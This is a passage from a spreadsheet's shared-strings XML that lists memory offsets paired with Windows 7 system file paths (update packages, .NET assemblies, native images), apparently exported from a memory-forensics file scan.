    <t>.17514.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde43ead0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_22_for_KB2773072~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde43eeb8</t>
  </si>
  <si>
    <t>0xde43f0f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Media-Format-Package~31bf3856ad364e35~x86~en-US~</t>
  </si>
  <si>
    <t>6.1.7601.1751</t>
  </si>
  <si>
    <t>0xde43f270</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~x86~en-</t>
  </si>
  <si>
    <t>US~6.1.7600.1</t>
  </si>
  <si>
    <t>6385.mum_x001B_[0</t>
  </si>
  <si>
    <t>0xde43f620</t>
  </si>
  <si>
    <t>7601.17514.mu</t>
  </si>
  <si>
    <t>0xde43fa68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~x86~~6.</t>
  </si>
  <si>
    <t>0xde43fd98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3075220_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde43fe50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_115_for_KB2773072~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4401d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Shell-PremiumInboxGames-Package~31bf3856ad364e35</t>
  </si>
  <si>
    <t>0xde440680</t>
  </si>
  <si>
    <t>0xde4409b0</t>
  </si>
  <si>
    <t>7600.16385.</t>
  </si>
  <si>
    <t>0xde440a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Shell-InboxGames-Package~31bf3856ad364e35~x86~~6</t>
  </si>
  <si>
    <t>0xde440d30</t>
  </si>
  <si>
    <t>0xde440e50</t>
  </si>
  <si>
    <t>US~6.1.7601.1</t>
  </si>
  <si>
    <t>7514.mum_x001B_[0</t>
  </si>
  <si>
    <t>0xde441300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Shell-MultiplayerInboxGames-Package~31bf3856ad36</t>
  </si>
  <si>
    <t>4e35~x86~en-U</t>
  </si>
  <si>
    <t>S~6.1.7601.</t>
  </si>
  <si>
    <t>17514.</t>
  </si>
  <si>
    <t>0xde4416e8</t>
  </si>
  <si>
    <t>S~6.1.7600.</t>
  </si>
  <si>
    <t>16385.</t>
  </si>
  <si>
    <t>0xde441ad0</t>
  </si>
  <si>
    <t>4e35~x86~~6.1</t>
  </si>
  <si>
    <t>.7600.16385</t>
  </si>
  <si>
    <t>.mum_x001B_[</t>
  </si>
  <si>
    <t>0xde441e00</t>
  </si>
  <si>
    <t>0xde441eb8</t>
  </si>
  <si>
    <t>0xde442148</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3013531~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde442298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Shell-InboxGames-Package~31bf3856ad364e35~x86~en</t>
  </si>
  <si>
    <t>0xde442748</t>
  </si>
  <si>
    <t>.7601.17514</t>
  </si>
  <si>
    <t>0xde442a10</t>
  </si>
  <si>
    <t>0xde442b30</t>
  </si>
  <si>
    <t>0xde442e60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-MediaPlayback-OC-Package~31bf3856ad364e35~x86~~6</t>
  </si>
  <si>
    <t>0xde442f18</t>
  </si>
  <si>
    <t>0xde443310</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Help-CoreClientUAPE-Package~31bf3856ad364e35~x86</t>
  </si>
  <si>
    <t>0xde4433c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3138910~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde443560</t>
  </si>
  <si>
    <t>0xde443680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-IIS-WebServer-Package~31bf3856ad364e35~x86~en-US</t>
  </si>
  <si>
    <t>~6.1.7601.175</t>
  </si>
  <si>
    <t>14.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde443a68</t>
  </si>
  <si>
    <t>0xde443d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_292_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde443e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-IIS-WebServer-Package~31bf3856ad364e35~x86~~6.1.</t>
  </si>
  <si>
    <t>0xde4441e0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RasCMAK-Package~31bf3856ad364e35~x86~~6.1.7600.1</t>
  </si>
  <si>
    <t>6385.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde444300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2973112_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4446e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2973112~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde444ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-NetFx3-OC-Package~31bf3856ad364e35~x86~en-US~6.1</t>
  </si>
  <si>
    <t>0xde444d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RasRip-Package~31bf3856ad364e35~x86~en-US~6.1.76</t>
  </si>
  <si>
    <t>0xde444eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-NetFx3-OC-Package~31bf3856ad364e35~x86~~6.1.7600</t>
  </si>
  <si>
    <t>0xde445108</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3046017_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4454f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3046017~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4458d8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3021917~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde445e60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3161102~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde445f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4463a0</t>
  </si>
  <si>
    <t>\Windows\System32\msvcrt.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde446930</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2698365~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde446de8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_654_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde447580</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2732059_SP1~31bf3856ad364e35~x86~~6.1.5.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde447af8</t>
  </si>
  <si>
    <t>\Windows\System32\msxml3r.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde450340</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2820331_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde450700</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-MediaPlayer-Package~31bf3856ad364e35~x86~en-US~6</t>
  </si>
  <si>
    <t>0xde4507b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3109560~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde450b38</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2820331~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4512e0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~x86~en-US~6</t>
  </si>
  <si>
    <t>0xde451560</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RasCMAK-Package~31bf3856ad364e35~x86~en-US~6.1.7</t>
  </si>
  <si>
    <t>600.16385.mum</t>
  </si>
  <si>
    <t>0xde451680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2943357_SP1~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde451a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2943357~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde451d98</t>
  </si>
  <si>
    <t>0xde451e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2973112~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4523a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~x86~~</t>
  </si>
  <si>
    <t>0xde452560</t>
  </si>
  <si>
    <t>601.17514.mum</t>
  </si>
  <si>
    <t>0xde452680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2656356~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde452a68</t>
  </si>
  <si>
    <t>0xde452d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_61_for_KB2992611~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde452e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2943357~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4531d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2660075~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde453420</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2727528~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde453750</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_101_for_KB2750841~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde453a18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2918077~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde453ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2847927~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde453eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2820331~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4544b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3172605_SP1~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde454948</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RemoteFX-VM-Setup-LanguagePack~31bf3856ad364e35~</t>
  </si>
  <si>
    <t>x86~en-US~6.1</t>
  </si>
  <si>
    <t>0xde454f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RemoteFX-VM-Setup-Package~31bf3856ad364e35~x86~~</t>
  </si>
  <si>
    <t>0xde45d038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_41_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde45d128</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3147071_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde45d4a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde45d6d8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-MediaPlayer-DVDRegistration-Package~31bf3856ad36</t>
  </si>
  <si>
    <t>0xde45d8b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3006121_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde45db78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3155178~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde45dc98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3006121~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde45dec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3150220~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde45df80</t>
  </si>
  <si>
    <t>\Windows\System32\avifil32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde600140</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehiUPnP\6.1.0.0__31bf3856ad364e35\ehiUPnP.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6001f8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehiExtens\6.1.0.0__31bf3856ad364e35\ehiExtens.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde600360</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.JScript\8.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde600418</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehiBmlDataCarousel\6.1.0.0__31bf3856ad364e35\ehiBmlDataCarousel.dll</t>
  </si>
  <si>
    <t>0xde600700</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehiActivScp\6.1.0.0__31bf3856ad364e35\ehiActivScp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde600920</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehexthost\6.1.0.0__31bf3856ad364e35\ehexthost.exe.config_x001B_[0K</t>
  </si>
  <si>
    <t>0xde600b40</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehCIR\6.1.0.0__31bf3856ad364e35\ehCIR.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde600d60</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\dfsvc\2.0.0.0__b03f5f7f11d50a3a\dfsvc.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde600f80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6018e8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\AspNetMMCExt\2.0.0.0__b03f5f7f11d50a3a\AspNetMMCExt.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde601b40</t>
  </si>
  <si>
    <t>0xde601d60</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehiTVMSMusic\6.1.0.0__31bf3856ad364e35\ehiTVMSMusic.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde601f80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehiiTV\6.1.0.0__31bf3856ad364e35\ehiiTV.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde602038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\stexstor.inf_x86_neutral_80ee226e29362f51\stexsto</t>
  </si>
  <si>
    <t>r.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde602260</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\processr.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde602348</t>
  </si>
  <si>
    <t>\Windows\System32\wdmaud.drv_x001B_[0K</t>
  </si>
  <si>
    <t>0xde602820</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ar-sa_3b02d130904371b4.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde603038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehiWUapi\6.1.0.0__31bf3856ad364e35\ehiWUapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde603148</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ehiBmlDataCarousel\1eafa678b451582b87cd_x001B_[0K</t>
  </si>
  <si>
    <t>0xde603678</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msdt.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6038e0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\UIAutomationClientsideProviders\3.0.0.0__31bf3856ad364e35\UIAutomat</t>
  </si>
  <si>
    <t>ionClientside</t>
  </si>
  <si>
    <t>Providers.d</t>
  </si>
  <si>
    <t>0xde603a40</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_createdisc_styles_ntsc_c4d1e502f2c449b1.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde604038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\MIGUIControls\51e3c28c5b04979d271d_x001B_[0K</t>
  </si>
  <si>
    <t>0xde604168</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ehiUPnP\f380e70852ebd5cae7d5_x001B_[0K</t>
  </si>
  <si>
    <t>0xde604700</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_appraiser_59bebec9f06db09b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde604880</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_advancedinstallers_dfe2cf200b391371.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde604ca0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_272_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde605160</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ehiActivScp\86e63a9212d1b0bcb965_x001B_[0K</t>
  </si>
  <si>
    <t>0xde605b18</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ehiVidCtl\23b6431194fd467e4970_x001B_[0K</t>
  </si>
  <si>
    <t>0xde605bd0</t>
  </si>
  <si>
    <t>0xde605c88</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehRecObj\6.1.0.0__31bf3856ad364e35\ehRecObj.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde605e00</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\avicap32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde605f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_speech_engines_lexicon_en-us_bd71d54bf658e12b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde606038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.MediaCenter.iTv.Hosting\6.1.0.0__31bf3856ad364e35\Microso</t>
  </si>
  <si>
    <t>ft.MediaCente</t>
  </si>
  <si>
    <t>r.iTv.Hosti</t>
  </si>
  <si>
    <t>ng.dll</t>
  </si>
  <si>
    <t>0xde6061a0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.DataVisualization.Design\v4.0_4.0.0.0__31b</t>
  </si>
  <si>
    <t>f3856ad364e35</t>
  </si>
  <si>
    <t>\System.Web</t>
  </si>
  <si>
    <t>.DataV</t>
  </si>
  <si>
    <t>isualization.Design.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6065e0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_windowsmediaplayerplaydvd_en-us_17d71967caf66a1</t>
  </si>
  <si>
    <t>7.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde606700</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.DataVisualization\v4.0_4.0.0.0__31bf3856ad</t>
  </si>
  <si>
    <t>364e35\System</t>
  </si>
  <si>
    <t>.Web.DataVi</t>
  </si>
  <si>
    <t>sualiz</t>
  </si>
  <si>
    <t>ation.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde606c08</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ehshell\c4a0cdc028553aad155a_x001B_[0K</t>
  </si>
  <si>
    <t>0xde606f80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ehiTVMSMusic\0ae97aee81da17a6b74d_x001B_[0K</t>
  </si>
  <si>
    <t>0xde607cd0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\kbdclass.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde607d88</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\AspNetMMCExt\af8389dfd734a147d0d2_x001B_[0K</t>
  </si>
  <si>
    <t>0xde608348</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP8FA6.tmp\Microsoft.MediaCenter.ITVVM.dll_x001B_</t>
  </si>
  <si>
    <t>0xde608730</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Controls.Ribbon\v4.0_4.0.0.0__b77a5c56</t>
  </si>
  <si>
    <t>1934e089\Syst</t>
  </si>
  <si>
    <t>em.Windows.</t>
  </si>
  <si>
    <t>Contro</t>
  </si>
  <si>
    <t>ls.Ribbon.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde608b30</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\EventViewer\6.1.0.0__31bf3856ad364e35\EventViewer.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde608f18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Routing\v4.0_4.0.0.0__31bf3856ad364e35\Sys</t>
  </si>
  <si>
    <t>tem.Web.Routi</t>
  </si>
  <si>
    <t>ng.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde609328</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\832a3f427346d8237977cb37fbab5fa2\Com</t>
  </si>
  <si>
    <t>SvcConfig.ni.</t>
  </si>
  <si>
    <t>exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde609700</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Workflow.Runtime\v4.0_4.0.0.0__31bf3856ad364e3</t>
  </si>
  <si>
    <t>5\System.Work</t>
  </si>
  <si>
    <t>flow.Runtim</t>
  </si>
  <si>
    <t>e.dll_x001B_</t>
  </si>
  <si>
    <t>0xde609b10</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP4C5.tmp\Microsoft.GroupPolicy.Reporting.d</t>
  </si>
  <si>
    <t>0xde609ca0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.MediaCenter.iTV\6.1.0.0__31bf3856ad364e35\Microsoft.Media</t>
  </si>
  <si>
    <t>Center.iTV.dl</t>
  </si>
  <si>
    <t>0xde609dc0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms.DataVisualization\v4.0_4.0.0.0__</t>
  </si>
  <si>
    <t>31bf3856ad364</t>
  </si>
  <si>
    <t>e35\System.</t>
  </si>
  <si>
    <t>Window</t>
  </si>
  <si>
    <t>s.Forms.DataVisualization.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde60a038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP7CF3.tmp\Microsoft.MediaCenter.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde60a0f8</t>
  </si>
  <si>
    <t>0xde60a1b0</t>
  </si>
  <si>
    <t>0xde60a268</t>
  </si>
  <si>
    <t>0xde60a6e0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_msdtc_bridge_3.0.0.0_0000_5d60388d7f35c25e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde60ad60</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ComSvcConfig\24b2e9b5d872fd40914e_x001B_[0K</t>
  </si>
  <si>
    <t>0xde60ae18</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\MCESidebarCtrl\bc7d0c78248ab191d022_x001B_[0K</t>
  </si>
  <si>
    <t>0xde60af80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP3DAE.tmp\System.Web.Abstractions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde60b480</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\UIAutomationClient\3fd88f2d3f27c01ac5db_x001B_[0K</t>
  </si>
  <si>
    <t>0xde60b730</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.WorkflowServices\v4.0_4.0.0.0__31bf3856ad364e3</t>
  </si>
  <si>
    <t>flowService</t>
  </si>
  <si>
    <t>s.dll_x001B_</t>
  </si>
  <si>
    <t>0xde60bb40</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\fcfe95d38ecc16b92205d2986883</t>
  </si>
  <si>
    <t>ea8c\System.W</t>
  </si>
  <si>
    <t>indows.Form</t>
  </si>
  <si>
    <t>s.Data</t>
  </si>
  <si>
    <t>Visualization.Design.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde60bdf8</t>
  </si>
  <si>
    <t>0xde60bf18</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.WorkflowServices\3.5.0.0__31bf3856ad364e35\System.WorkflowSe</t>
  </si>
  <si>
    <t>rvices.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xde60c480</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP7289.tmp\Microsoft.VisualBasic.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde60c610</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xde60c730</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Xml.Linq\3.5.0.0__b77a5c561934e089\System.Xml.Linq.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde60cf18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xaml.Hosting\v4.0_4.0.0.0__31bf3856ad364e35\Sy</t>
  </si>
  <si>
    <t>stem.Xaml.Hos</t>
  </si>
  <si>
    <t>ting.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xde60d038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP544C.tmp\Microsoft.PowerShell.Editor.dll_x001B_</t>
  </si>
  <si>
    <t>0xde60d298</t>
  </si>
  <si>
    <t>0xde60d420</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationClientsideProviders\v4.0_4.0.0.0__31bf385</t>
  </si>
  <si>
    <t>6ad364e35\UIA</t>
  </si>
  <si>
    <t>utomationCl</t>
  </si>
  <si>
    <t>ientsi</t>
  </si>
  <si>
    <t>deProviders.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde60d958</t>
  </si>
  <si>
